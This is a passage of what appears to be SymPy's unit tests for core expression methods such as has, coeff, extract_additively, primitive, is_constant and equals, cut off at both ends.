assert expr.find(lambda u: type(u) is sin) == set([sin(x), sin(sin(x))])
assert expr.find(
lambda u: type(u) is sin, group=True) == {sin(x): 2, sin(sin(x)): 1}
assert expr.find(sin(a)) == set([sin(x), sin(sin(x))])
assert expr.find(sin(a), group=True) == {sin(x): 2, sin(sin(x)): 1}
assert expr.find(sin) == set([sin(x), sin(sin(x))])
assert expr.find(sin, group=True) == {sin(x): 2, sin(sin(x)): 1}
def test_count():
expr = (x + y + 2 + sin(3*x))
assert expr.count(lambda u: u.is_Integer) == 2
assert expr.count(lambda u: u.is_Symbol) == 3
assert expr.count(Integer) == 2
assert expr.count(Symbol) == 3
assert expr.count(2) == 1
a = Wild('a')
assert expr.count(sin) == 1
assert expr.count(sin(a)) == 1
assert expr.count(lambda u: type(u) is sin) == 1
def test_has_basics():
f = Function('f')
g = Function('g')
p = Wild('p')
assert sin(x).has(x)
assert sin(x).has(sin)
assert not sin(x).has(y)
assert not sin(x).has(cos)
assert f(x).has(x)
assert f(x).has(f)
assert not f(x).has(y)
assert not f(x).has(g)
assert f(x).diff(x).has(x)
assert f(x).diff(x).has(f)
assert f(x).diff(x).has(Derivative)
assert not f(x).diff(x).has(y)
assert not f(x).diff(x).has(g)
assert not f(x).diff(x).has(sin)
assert (x**2).has(Symbol)
assert not (x**2).has(Wild)
assert (2*p).has(Wild)
assert not x.has()
def test_has_multiple():
f = x**2*y + sin(2**t + log(z))
assert f.has(x)
assert f.has(y)
assert f.has(z)
assert f.has(t)
assert not f.has(u)
assert f.has(x, y, z, t)
assert f.has(x, y, z, t, u)
i = Integer(4400)
assert not i.has(x)
assert (i*x**i).has(x)
assert not (i*y**i).has(x)
assert (i*y**i).has(x, y)
assert not (i*y**i).has(x, z)
def test_has_piecewise():
f = (x*y + 3/y)**(3 + 2)
g = Function('g')
h = Function('h')
p = Piecewise((g(x), x < -1), (1, x <= 1), (f, True))
assert p.has(x)
assert p.has(y)
assert not p.has(z)
assert p.has(1)
assert p.has(3)
assert not p.has(4)
assert p.has(f)
assert p.has(g)
assert not p.has(h)
def test_has_iterative():
A, B, C = symbols('A,B,C', commutative=False)
f = x*gamma(x)*sin(x)*exp(x*y)*A*B*C*cos(x*A*B)
assert f.has(x)
assert f.has(x*y)
assert f.has(x*sin(x))
assert not f.has(x*sin(y))
assert f.has(x*A)
assert f.has(x*A*B)
assert not f.has(x*A*C)
assert f.has(x*A*B*C)
assert not f.has(x*A*C*B)
assert f.has(x*sin(x)*A*B*C)
assert not f.has(x*sin(x)*A*C*B)
assert not f.has(x*sin(y)*A*B*C)
assert f.has(x*gamma(x))
assert not f.has(x + sin(x))
assert (x & y & z).has(x & z)
def test_has_integrals():
f = Integral(x**2 + sin(x*y*z), (x, 0, x + y + z))
assert f.has(x + y)
assert f.has(x + z)
assert f.has(y + z)
assert f.has(x*y)
assert f.has(x*z)
assert f.has(y*z)
assert not f.has(2*x + y)
assert not f.has(2*x*y)
def test_has_tuple():
f = Function('f')
g = Function('g')
h = Function('h')
assert Tuple(x, y).has(x)
assert not Tuple(x, y).has(z)
assert Tuple(f(x), g(x)).has(x)
assert not Tuple(f(x), g(x)).has(y)
assert Tuple(f(x), g(x)).has(f)
assert Tuple(f(x), g(x)).has(f(x))
assert not Tuple(f, g).has(x)
assert Tuple(f, g).has(f)
assert not Tuple(f, g).has(h)
assert Tuple(True).has(True) is True # .has(1) will also be True
def test_has_units():
from sympy.physics.units import m, s
assert (x*m/s).has(x)
assert (x*m/s).has(y, z) is False
def test_has_polys():
poly = Poly(x**2 + x*y*sin(z), x, y, t)
assert poly.has(x)
assert poly.has(x, y, z)
assert poly.has(x, y, z, t)
def test_has_physics():
assert FockState((x, y)).has(x)
def test_as_poly_as_expr():
f = x**2 + 2*x*y
assert f.as_poly().as_expr() == f
assert f.as_poly(x, y).as_expr() == f
assert (f + sin(x)).as_poly(x, y) is None
p = Poly(f, x, y)
assert p.as_poly() == p
def test_nonzero():
assert bool(S.Zero) is False
assert bool(S.One) is True
assert bool(x) is True
assert bool(x + y) is True
assert bool(x - x) is False
assert bool(x*y) is True
assert bool(x*1) is True
assert bool(x*0) is False
def test_is_number():
assert Float(3.14).is_number is True
assert Integer(737).is_number is True
assert Rational(3, 2).is_number is True
assert Rational(8).is_number is True
assert x.is_number is False
assert (2*x).is_number is False
assert (x + y).is_number is False
assert log(2).is_number is True
assert log(x).is_number is False
assert (2 + log(2)).is_number is True
assert (8 + log(2)).is_number is True
assert (2 + log(x)).is_number is False
assert (8 + log(2) + x).is_number is False
assert (1 + x**2/x - x).is_number is True
assert Tuple(Integer(1)).is_number is False
assert Add(2, x).is_number is False
assert Mul(3, 4).is_number is True
assert Pow(log(2), 2).is_number is True
assert oo.is_number is True
g = WildFunction('g')
assert g.is_number is False
assert (2*g).is_number is False
assert (x**2).subs(x, 3).is_number is True
# test extensibility of .is_number
# on subinstances of Basic
class A(Basic):
pass
a = A()
assert a.is_number is False
def test_as_coeff_add():
assert S(2).as_coeff_add() == (2, ())
assert S(3.0).as_coeff_add() == (0, (S(3.0),))
assert S(-3.0).as_coeff_add() == (0, (S(-3.0),))
assert x.as_coeff_add() == (0, (x,))
assert (x - 1).as_coeff_add() == (-1, (x,))
assert (x + 1).as_coeff_add() == (1, (x,))
assert (x + 2).as_coeff_add() == (2, (x,))
assert (x + y).as_coeff_add(y) == (x, (y,))
assert (3*x).as_coeff_add(y) == (3*x, ())
# don't do expansion
e = (x + y)**2
assert e.as_coeff_add(y) == (0, (e,))
def test_as_coeff_mul():
assert S(2).as_coeff_mul() == (2, ())
assert S(3.0).as_coeff_mul() == (1, (S(3.0),))
assert S(-3.0).as_coeff_mul() == (-1, (S(3.0),))
assert x.as_coeff_mul() == (1, (x,))
assert (-x).as_coeff_mul() == (-1, (x,))
assert (2*x).as_coeff_mul() == (2, (x,))
assert (x*y).as_coeff_mul(y) == (x, (y,))
assert (3 + x).as_coeff_mul(y) == (3 + x, ())
# don't do expansion
e = exp(x + y)
assert e.as_coeff_mul(y) == (1, (e,))
e = 2**(x + y)
assert e.as_coeff_mul(y) == (1, (e,))
def test_as_coeff_exponent():
assert (3*x**4).as_coeff_exponent(x) == (3, 4)
assert (2*x**3).as_coeff_exponent(x) == (2, 3)
assert (4*x**2).as_coeff_exponent(x) == (4, 2)
assert (6*x**1).as_coeff_exponent(x) == (6, 1)
assert (3*x**0).as_coeff_exponent(x) == (3, 0)
assert (2*x**0).as_coeff_exponent(x) == (2, 0)
assert (1*x**0).as_coeff_exponent(x) == (1, 0)
assert (0*x**0).as_coeff_exponent(x) == (0, 0)
assert (-1*x**0).as_coeff_exponent(x) == (-1, 0)
assert (-2*x**0).as_coeff_exponent(x) == (-2, 0)
assert (2*x**3 + pi*x**3).as_coeff_exponent(x) == (2 + pi, 3)
assert (x*log(2)/(2*x + pi*x)).as_coeff_exponent(x) == \
(log(2)/(2 + pi), 0)
# 1685
D = Derivative
f = Function('f')
fx = D(f(x), x)
assert fx.as_coeff_exponent(f(x)) == (fx, 0)
def test_extractions():
assert ((x*y)**3).extract_multiplicatively(x**2 * y) == x*y**2
assert ((x*y)**3).extract_multiplicatively(x**4 * y) is None
assert (2*x).extract_multiplicatively(2) == x
assert (2*x).extract_multiplicatively(3) is None
assert (2*x).extract_multiplicatively(-1) is None
assert (Rational(1, 2)*x).extract_multiplicatively(3) == x/6
assert (sqrt(x)).extract_multiplicatively(x) is None
assert (sqrt(x)).extract_multiplicatively(1/x) is None
assert ((x*y)**3).extract_additively(1) is None
assert (x + 1).extract_additively(x) == 1
assert (x + 1).extract_additively(2*x) is None
assert (x + 1).extract_additively(-x) is None
assert (-x + 1).extract_additively(2*x) is None
assert (2*x + 3).extract_additively(x) == x + 3
assert (2*x + 3).extract_additively(2) == 2*x + 1
assert (2*x + 3).extract_additively(3) == 2*x
assert (2*x + 3).extract_additively(-2) is None
assert (2*x + 3).extract_additively(3*x) is None
assert (2*x + 3).extract_additively(2*x) == 3
assert x.extract_additively(0) == x
assert S(2).extract_additively(x) is None
assert S(2.).extract_additively(2) == S.Zero
assert S(2*x + 3).extract_additively(x + 1) == x + 2
assert S(2*x + 3).extract_additively(y + 1) is None
assert S(2*x - 3).extract_additively(x + 1) is None
assert S(2*x - 3).extract_additively(y + z) is None
assert ((a + 1)*x*4 + y).extract_additively(x).expand() == \
4*a*x + 3*x + y
assert ((a + 1)*x*4 + 3*y).extract_additively(x + 2*y).expand() == \
4*a*x + 3*x + y
assert (y*(x + 1)).extract_additively(x + 1) is None
assert ((y + 1)*(x + 1) + 3).extract_additively(x + 1) == \
y*(x + 1) + 3
assert ((x + y)*(x + 1) + x + y + 3).extract_additively(x + y) == \
x*(x + y) + 3
assert (x + y + 2*((x + y)*(x + 1)) + 3).extract_additively((x + y)*(x + 1)) == \
x + y + (x + 1)*(x + y) + 3
assert ((y + 1)*(x + 2*y + 1) + 3).extract_additively(y + 1) == \
(x + 2*y)*(y + 1) + 3
n = Symbol("n", integer=True)
assert (Integer(-3)).could_extract_minus_sign() is True
assert (-n*x + x).could_extract_minus_sign() != \
(n*x - x).could_extract_minus_sign()
assert (x - y).could_extract_minus_sign() != \
(-x + y).could_extract_minus_sign()
assert (1 - x - y).could_extract_minus_sign() is True
assert (1 - x + y).could_extract_minus_sign() is False
assert ((-x - x*y)/y).could_extract_minus_sign() is True
assert (-(x + x*y)/y).could_extract_minus_sign() is True
assert ((x + x*y)/(-y)).could_extract_minus_sign() is True
assert ((x + x*y)/y).could_extract_minus_sign() is False
assert (x*(-x - x**3)).could_extract_minus_sign() is True
assert ((-x - y)/(x + y)).could_extract_minus_sign() is True
# The results of each of these will vary on different machines, e.g.
# the first one might be False and the other (then) is true or vice versa,
# so both are included.
assert ((-x - y)/(x - y)).could_extract_minus_sign() is False or \
((-x - y)/(y - x)).could_extract_minus_sign() is False
assert (x - y).could_extract_minus_sign() is False
assert (-x + y).could_extract_minus_sign() is True
def test_coeff():
assert (x + 1).coeff(x + 1) == 1
assert (3*x).coeff(0) == 0
assert (z*(1 + x)*x**2).coeff(1 + x) == z*x**2
assert (1 + 2*x*x**(1 + x)).coeff(x*x**(1 + x)) == 2
assert (1 + 2*x**(y + z)).coeff(x**(y + z)) == 2
assert (3 + 2*x + 4*x**2).coeff(1) == 0
assert (3 + 2*x + 4*x**2).coeff(-1) == 0
assert (3 + 2*x + 4*x**2).coeff(x) == 2
assert (3 + 2*x + 4*x**2).coeff(x**2) == 4
assert (3 + 2*x + 4*x**2).coeff(x**3) == 0
assert (-x/8 + x*y).coeff(x) == -S(1)/8 + y
assert (-x/8 + x*y).coeff(-x) == S(1)/8
assert (4*x).coeff(2*x) == 0
assert (2*x).coeff(2*x) == 1
assert (-oo*x).coeff(x*oo) == -1
n1, n2 = symbols('n1 n2', commutative=False)
assert (n1*n2).coeff(n1) == 1
assert (n1*n2).coeff(n2) == n1
assert (n1*n2 + x*n1).coeff(n1) == 1 # 1*n1*(n2+x)
assert (n2*n1 + x*n1).coeff(n1) == n2 + x
assert (n2*n1 + x*n1**2).coeff(n1) == n2
assert (n1**x).coeff(n1) == 0
assert (n1*n2 + n2*n1).coeff(n1) == 0
assert (2*(n1 + n2)*n2).coeff(n1 + n2, right=1) == n2
assert (2*(n1 + n2)*n2).coeff(n1 + n2, right=0) == 2
f = Function('f')
assert (2*f(x) + 3*f(x).diff(x)).coeff(f(x)) == 2
expr = z*(x + y)**2
expr2 = z*(x + y)**2 + z*(2*x + 2*y)**2
assert expr.coeff(z) == (x + y)**2
assert expr.coeff(x + y) == 0
assert expr2.coeff(z) == (x + y)**2 + (2*x + 2*y)**2
assert (x + y + 3*z).coeff(1) == x + y
assert (-x + 2*y).coeff(-1) == x
assert (x - 2*y).coeff(-1) == 2*y
assert (3 + 2*x + 4*x**2).coeff(1) == 0
assert (-x - 2*y).coeff(2) == -y
assert (x + sqrt(2)*x).coeff(sqrt(2)) == x
assert (3 + 2*x + 4*x**2).coeff(x) == 2
assert (3 + 2*x + 4*x**2).coeff(x**2) == 4
assert (3 + 2*x + 4*x**2).coeff(x**3) == 0
assert (z*(x + y)**2).coeff((x + y)**2) == z
assert (z*(x + y)**2).coeff(x + y) == 0
assert (2 + 2*x + (x + 1)*y).coeff(x + 1) == y
assert (x + 2*y + 3).coeff(1) == x
assert (x + 2*y + 3).coeff(x, 0) == 2*y + 3
assert (x**2 + 2*y + 3*x).coeff(x**2, 0) == 2*y + 3*x
assert x.coeff(0, 0) == 0
assert x.coeff(x, 0) == 0
n, m, o, l = symbols('n m o l', commutative=False)
assert n.coeff(n) == 1
assert y.coeff(n) == 0
assert (3*n).coeff(n) == 3
assert (2 + n).coeff(x*m) == 0
assert (2*x*n*m).coeff(x) == 2*n*m
assert (2 + n).coeff(x*m*n + y) == 0
assert (2*x*n*m).coeff(3*n) == 0
assert (n*m + m*n*m).coeff(n) == 1 + m
assert (n*m + m*n*m).coeff(n, right=True) == m # = (1 + m)*n*m
assert (n*m + m*n).coeff(n) == 0
assert (n*m + o*m*n).coeff(m*n) == o
assert (n*m + o*m*n).coeff(m*n, right=1) == 1
assert (n*m + n*m*n).coeff(n*m, right=1) == 1 + n # = n*m*(n + 1)
def test_coeff2():
r, kappa = symbols('r, kappa')
psi = Function("psi")
g = 1/r**2 * (2*r*psi(r).diff(r, 1) + r**2 * psi(r).diff(r, 2))
g = g.expand()
assert g.coeff((psi(r).diff(r))) == 2/r
def test_coeff2_0():
r, kappa = symbols('r, kappa')
psi = Function("psi")
g = 1/r**2 * (2*r*psi(r).diff(r, 1) + r**2 * psi(r).diff(r, 2))
g = g.expand()
assert g.coeff(psi(r).diff(r, 2)) == 1
def test_coeff_expand():
expr = z*(x + y)**2
expr2 = z*(x + y)**2 + z*(2*x + 2*y)**2
assert expr.coeff(z) == (x + y)**2
assert expr2.coeff(z) == (x + y)**2 + (2*x + 2*y)**2
def test_integrate():
assert x.integrate(x) == x**2/2
assert x.integrate((x, 0, 1)) == S(1)/2
def test_as_base_exp():
assert x.as_base_exp() == (x, S.One)
assert (x*y*z).as_base_exp() == (x*y*z, S.One)
assert (x + y + z).as_base_exp() == (x + y + z, S.One)
assert ((x + y)**z).as_base_exp() == (x + y, z)
def test_issue1864():
assert hasattr(Mul(x, y), "is_commutative")
assert hasattr(Mul(x, y, evaluate=False), "is_commutative")
assert hasattr(Pow(x, y), "is_commutative")
assert hasattr(Pow(x, y, evaluate=False), "is_commutative")
expr = Mul(Pow(2, 2, evaluate=False), 3, evaluate=False) + 1
assert hasattr(expr, "is_commutative")
def test_action_verbs():
assert nsimplify((1/(exp(3*pi*x/5) + 1))) == \
(1/(exp(3*pi*x/5) + 1)).nsimplify()
assert ratsimp(1/x + 1/y) == (1/x + 1/y).ratsimp()
assert trigsimp(log(x), deep=True) == (log(x)).trigsimp(deep=True)
assert radsimp(1/(2 + sqrt(2))) == (1/(2 + sqrt(2))).radsimp()
assert powsimp(x**y*x**z*y**z, combine='all') == \
(x**y*x**z*y**z).powsimp(combine='all')
assert simplify(x**y*x**z*y**z) == (x**y*x**z*y**z).simplify()
assert together(1/x + 1/y) == (1/x + 1/y).together()
# Not tested because it's deprecated
#assert separate((x*(y*z)**3)**2) == ((x*(y*z)**3)**2).separate()
assert collect(a*x**2 + b*x**2 + a*x - b*x + c, x) == \
(a*x**2 + b*x**2 + a*x - b*x + c).collect(x)
assert apart(y/(y + 2)/(y + 1), y) == (y/(y + 2)/(y + 1)).apart(y)
assert combsimp(y/(x + 2)/(x + 1)) == (y/(x + 2)/(x + 1)).combsimp()
assert factor(x**2 + 5*x + 6) == (x**2 + 5*x + 6).factor()
assert refine(sqrt(x**2)) == sqrt(x**2).refine()
assert cancel((x**2 + 5*x + 6)/(x + 2)) == ((x**2 + 5*x + 6)/(x + 2)).cancel()
def test_as_powers_dict():
assert x.as_powers_dict() == {x: 1}
assert (x**y*z).as_powers_dict() == {x: y, z: 1}
assert Mul(2, 2, evaluate=False).as_powers_dict() == {S(2): S(2)}
assert (x*y).as_powers_dict()[z] == 0
assert (x + y).as_powers_dict()[z] == 0
def test_as_coefficients_dict():
check = [S(1), x, y, x*y, 1]
assert [Add(3*x, 2*x, y, 3).as_coefficients_dict()[i] for i in check] == \
[3, 5, 1, 0, 0]
assert [(3*x*y).as_coefficients_dict()[i] for i in check] == \
[0, 0, 0, 3, 0]
assert (3.0*x*y).as_coefficients_dict()[3.0*x*y] == 1
def test_args_cnc():
A = symbols('A', commutative=False)
assert (x + A).args_cnc() == \
[[], [x + A]]
assert (x + a).args_cnc() == \
[[a + x], []]
assert (x*a).args_cnc() == \
[[a, x], []]
assert (x*y*A*(A + 1)).args_cnc(cset=True) == \
[set([x, y]), [A, 1 + A]]
assert Mul(x, x, evaluate=False).args_cnc(cset=True, warn=False) == \
[set([x]), []]
assert Mul(x, x**2, evaluate=False).args_cnc(cset=True, warn=False) == \
[set([x, x**2]), []]
raises(ValueError, lambda: Mul(x, x, evaluate=False).args_cnc(cset=True))
assert Mul(x, y, x, evaluate=False).args_cnc() == \
[[x, y, x], []]
# always split -1 from leading number
assert (-1.*x).args_cnc() == [[-1, 1.0, x], []]
def test_new_rawargs():
n = Symbol('n', commutative=False)
a = x + n
assert a.is_commutative is False
assert a._new_rawargs(x).is_commutative
assert a._new_rawargs(x, y).is_commutative
assert a._new_rawargs(x, n).is_commutative is False
assert a._new_rawargs(x, y, n).is_commutative is False
m = x*n
assert m.is_commutative is False
assert m._new_rawargs(x).is_commutative
assert m._new_rawargs(n).is_commutative is False
assert m._new_rawargs(x, y).is_commutative
assert m._new_rawargs(x, n).is_commutative is False
assert m._new_rawargs(x, y, n).is_commutative is False
assert m._new_rawargs(x, n, reeval=False).is_commutative is False
assert m._new_rawargs(S.One) is S.One
def test_2127():
assert Add(evaluate=False) == 0
assert Mul(evaluate=False) == 1
assert Mul(x + y, evaluate=False).is_Add
def test_free_symbols():
# free_symbols should return the free symbols of an object
assert S(1).free_symbols == set()
assert (x).free_symbols == set([x])
assert Integral(x, (x, 1, y)).free_symbols == set([y])
assert (-Integral(x, (x, 1, y))).free_symbols == set([y])
assert meter.free_symbols == set()
assert (meter**x).free_symbols == set([x])
def test_issue2201():
x = Symbol('x', commutative=False)
assert x*sqrt(2)/sqrt(6) == x*sqrt(3)/3
def test_as_coeff_Mul():
assert Integer(3).as_coeff_Mul() == (Integer(3), Integer(1))
assert Rational(3, 4).as_coeff_Mul() == (Rational(3, 4), Integer(1))
assert Float(5.0).as_coeff_Mul() == (Float(5.0), Integer(1))
assert (Integer(3)*x).as_coeff_Mul() == (Integer(3), x)
assert (Rational(3, 4)*x).as_coeff_Mul() == (Rational(3, 4), x)
assert (Float(5.0)*x).as_coeff_Mul() == (Float(5.0), x)
assert (Integer(3)*x*y).as_coeff_Mul() == (Integer(3), x*y)
assert (Rational(3, 4)*x*y).as_coeff_Mul() == (Rational(3, 4), x*y)
assert (Float(5.0)*x*y).as_coeff_Mul() == (Float(5.0), x*y)
assert (x).as_coeff_Mul() == (S.One, x)
assert (x*y).as_coeff_Mul() == (S.One, x*y)
def test_as_coeff_Add():
assert Integer(3).as_coeff_Add() == (Integer(3), Integer(0))
assert Rational(3, 4).as_coeff_Add() == (Rational(3, 4), Integer(0))
assert Float(5.0).as_coeff_Add() == (Float(5.0), Integer(0))
assert (Integer(3) + x).as_coeff_Add() == (Integer(3), x)
assert (Rational(3, 4) + x).as_coeff_Add() == (Rational(3, 4), x)
assert (Float(5.0) + x).as_coeff_Add() == (Float(5.0), x)
assert (Integer(3) + x + y).as_coeff_Add() == (Integer(3), x + y)
assert (Rational(3, 4) + x + y).as_coeff_Add() == (Rational(3, 4), x + y)
assert (Float(5.0) + x + y).as_coeff_Add() == (Float(5.0), x + y)
assert (x).as_coeff_Add() == (S.Zero, x)
assert (x*y).as_coeff_Add() == (S.Zero, x*y)
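# Illustrative note (added for clarity, not part of the original suite):
# as_coeff_Mul() and as_coeff_Add() split an expression into its leading
# numeric coefficient and the remainder, falling back to the identity
# element of the operation (S.One for Mul, S.Zero for Add) when no numeric
# part is present, as the two tests above demonstrate.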
def test_expr_sorting():
f, g = symbols('f,g', cls=Function)
exprs = [1/x**2, 1/x, sqrt(sqrt(x)), sqrt(x), x, sqrt(x)**3, x**2]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [x, 2*x, 2*x**2, 2*x**3, x**n, 2*x**n, sin(x), sin(x)**n,
sin(x**2), cos(x), cos(x**2), tan(x)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [x + 1, x**2 + x + 1, x**3 + x**2 + x + 1]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [S(4), x - 3*I/2, x + 3*I/2, x - 4*I + 1, x + 4*I + 1]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [f(1), f(2), f(3), f(1, 2, 3), g(1), g(2), g(3), g(1, 2, 3)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [f(x), g(x), exp(x), sin(x), cos(x), factorial(x)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [Tuple(x, y), Tuple(x, z), Tuple(x, y, z)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [[3], [1, 2]]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [[1, 2], [2, 3]]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [[1, 2], [1, 2, 3]]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [{x: -y}, {x: y}]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [set([1]), set([1, 2])]
assert sorted(exprs, key=default_sort_key) == exprs
def test_as_ordered_factors():
f, g = symbols('f,g', cls=Function)
assert x.as_ordered_factors() == [x]
assert (2*x*x**n*sin(x)*cos(x)).as_ordered_factors() \
== [Integer(2), x, x**n, sin(x), cos(x)]
args = [f(1), f(2), f(3), f(1, 2, 3), g(1), g(2), g(3), g(1, 2, 3)]
expr = Mul(*args)
assert expr.as_ordered_factors() == args
A, B = symbols('A,B', commutative=False)
assert (A*B).as_ordered_factors() == [A, B]
assert (B*A).as_ordered_factors() == [B, A]
def test_as_ordered_terms():
f, g = symbols('f,g', cls=Function)
assert x.as_ordered_terms() == [x]
assert (sin(x)**2*cos(x) + sin(x)*cos(x)**2 + 1).as_ordered_terms() \
== [sin(x)**2*cos(x), sin(x)*cos(x)**2, 1]
args = [f(1), f(2), f(3), f(1, 2, 3), g(1), g(2), g(3), g(1, 2, 3)]
expr = Add(*args)
assert expr.as_ordered_terms() == args
assert (1 + 4*sqrt(3)*pi*x).as_ordered_terms() == [4*pi*x*sqrt(3), 1]
assert ( 2 + 3*I).as_ordered_terms() == [2, 3*I]
assert (-2 + 3*I).as_ordered_terms() == [-2, 3*I]
assert ( 2 - 3*I).as_ordered_terms() == [2, -3*I]
assert (-2 - 3*I).as_ordered_terms() == [-2, -3*I]
assert ( 4 + 3*I).as_ordered_terms() == [4, 3*I]
assert (-4 + 3*I).as_ordered_terms() == [-4, 3*I]
assert ( 4 - 3*I).as_ordered_terms() == [4, -3*I]
assert (-4 - 3*I).as_ordered_terms() == [-4, -3*I]
f = x**2*y**2 + x*y**4 + y + 2
assert f.as_ordered_terms(order="lex") == [x**2*y**2, x*y**4, y, 2]
assert f.as_ordered_terms(order="grlex") == [x*y**4, x**2*y**2, y, 2]
assert f.as_ordered_terms(order="rev-lex") == [2, y, x*y**4, x**2*y**2]
assert f.as_ordered_terms(order="rev-grlex") == [2, y, x**2*y**2, x*y**4]
def test_sort_key_atomic_expr():
from sympy.physics.units import m, s
assert sorted([-m, s], key=lambda arg: arg.sort_key()) == [-m, s]
def test_issue_1100():
# first subs and limit gives NaN
a = x/y
assert a._eval_interval(x, 0, oo)._eval_interval(y, oo, 0) is S.NaN
# second subs and limit gives NaN
assert a._eval_interval(x, 0, oo)._eval_interval(y, 0, oo) is S.NaN
# difference gives S.NaN
a = x - y
assert a._eval_interval(x, 1, oo)._eval_interval(y, oo, 1) is S.NaN
raises(ValueError, lambda: x._eval_interval(x, None, None))
def test_primitive():
assert (3*(x + 1)**2).primitive() == (3, (x + 1)**2)
assert (6*x + 2).primitive() == (2, 3*x + 1)
assert (x/2 + 3).primitive() == (S(1)/2, x + 6)
eq = (6*x + 2)*(x/2 + 3)
assert eq.primitive()[0] == 1
eq = (2 + 2*x)**2
assert eq.primitive()[0] == 1
assert (4.0*x).primitive() == (1, 4.0*x)
assert (4.0*x + y/2).primitive() == (S.Half, 8.0*x + y)
assert (-2*x).primitive() == (2, -x)
assert Add(5*z/7, 0.5*x, 3*y/2, evaluate=False).primitive() == \
(S(1)/14, 7.0*x + 21*y + 10*z)
for i in [S.Infinity, S.NegativeInfinity, S.ComplexInfinity]:
assert (i + x/3).primitive() == \
(S(1)/3, i + x)
assert (S.Infinity + 2*x/3 + 4*y/7).primitive() == \
(S(1)/21, 14*x + 12*y + oo)
assert S.Zero.primitive() == (S.One, S.Zero)
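# Illustrative note (added for clarity, not part of the original suite):
# expr.primitive() factors out the rational "content" c so that
# expr == c*prim, with prim carrying integer-primitive rational
# coefficients, e.g. (6*x + 2).primitive() == (2, 3*x + 1).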
def test_issue_2744():
a = 1 + x
assert (2*a).extract_multiplicatively(a) == 2
assert (4*a).extract_multiplicatively(2*a) == 2
assert ((3*a)*(2*a)).extract_multiplicatively(a) == 6*a
def test_is_constant():
from sympy.solvers.solvers import checksol
    assert Sum(x, (x, 1, 10)).is_constant() is True
    assert Sum(x, (x, 1, n)).is_constant() is False
    assert Sum(x, (x, 1, n)).is_constant(y) is True
    assert Sum(x, (x, 1, n)).is_constant(n) is False
    assert Sum(x, (x, 1, n)).is_constant(x) is True
eq = a*cos(x)**2 + a*sin(x)**2 - a
    assert eq.is_constant() is True
assert eq.subs({x: pi, a: 2}) == eq.subs({x: pi, a: 3}) == 0
assert x.is_constant() is False
assert x.is_constant(y) is True
assert checksol(x, x, Sum(x, (x, 1, n))) is False
f = Function('f')
assert checksol(x, x, f(x)) is False
p = symbols('p', positive=True)
assert Pow(x, S(0), evaluate=False).is_constant() is True # == 1
assert Pow(S(0), x, evaluate=False).is_constant() is False # == 0 or 1
assert Pow(S(0), p, evaluate=False).is_constant() is True # == 1
assert (2**x).is_constant() is False
assert Pow(S(2), S(3), evaluate=False).is_constant() is True
z1, z2 = symbols('z1 z2', zero=True)
assert (z1 + 2*z2).is_constant() is True
assert meter.is_constant() is True
assert (3*meter).is_constant() is True
assert (x*meter).is_constant() is False
def test_equals():
assert (-3 - sqrt(5) + (-sqrt(10)/2 - sqrt(2)/2)**2).equals(0)
assert (x**2 - 1).equals((x + 1)*(x - 1))
assert (cos(x)**2 + sin(x)**2).equals(1)
assert (a*cos(x)**2 + a*sin(x)**2).equals(a)
r = sqrt(2)
assert (-1/(r + r*x) + 1/r/(1 + x)).equals(0)
assert factorial(x + 1).equals((x + 1)*factorial(x))
assert sqrt(3).equals(2*sqrt(3)) is False
assert (sqrt(5)*sqrt(3)).equals(sqrt(3)) is False
assert (sqrt(5) + sqrt(3)).equals(0) is False
assert (sqrt(5) + pi).equals(0) is False
assert meter.equals(0) is False
assert (3*meter**2).equals(0) is False
eq = -(-1)**(S(3)/4)*6**(S(1)/4) + (-6)**(S(1)/4)*I
if eq != 0: # if canonicalization makes this zero, skip the test
assert eq.equals(0)
assert sqrt(x).equals(0) is False
# from integrate(x*sqrt(1+2*x), x);
# diff is zero only when assumptions allow
i = 2*sqrt(2)*x**(S(5)/2)*(1 + 1/(2*x))**(S(5)/2)/5 + \
2*sqrt(2)*x**(S(3)/2)*(1 + 1/(2*x))**(S(5)/2)/(-6 - 3/x)
ans = sqrt(2*x + 1)*(6*x**2 + x - 1)/15
diff = i - ans
assert diff.equals(0) is False
assert diff.subs(x, -S.Half/2) == 7*sqrt(2)/120
# there are regions for x for which the expression is True, for
# example, when x < -1/2 or x > 0 the expression is zero
p = Symbol('p', positive=True)
assert diff.subs(x, p).equals(0) is True
assert diff.subs(x, -1).equals(0) is True
# prove via minimal_polynomial or self-consistency
eq = sqrt(1 + sqrt(3)) + sqrt(3 + 3*sqrt(3)) - sqrt(10 + 6*sqrt(3))
assert eq.equals(0)
q = 3**Rational(1, 3) + 3
p = expand(q**3)**Rational(1, 3)
assert (p - q).equals(0)
# issue 3730
# eq = q*x + q/4 + x**4 + x**3 + 2*x**2 - S(1)/3
# z = eq.subs(x, solve(eq, x)[0])
q = symbols('q')
z = (q*(-sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12)/2 - sqrt((2*q - S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/6)/2 - S(1)/4) + q/4 + (-sqrt(-2*(-(q
- S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) - S(13)/12)/2 - sqrt((2*q
- S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/6)/2 - S(1)/4)**4 + (-sqrt(-2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/12)/2 - sqrt((2*q -
S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/6)/2 - S(1)/4)**3 + 2*(-sqrt(-2*(-(q - S(7)/8)**S(2)/8 -
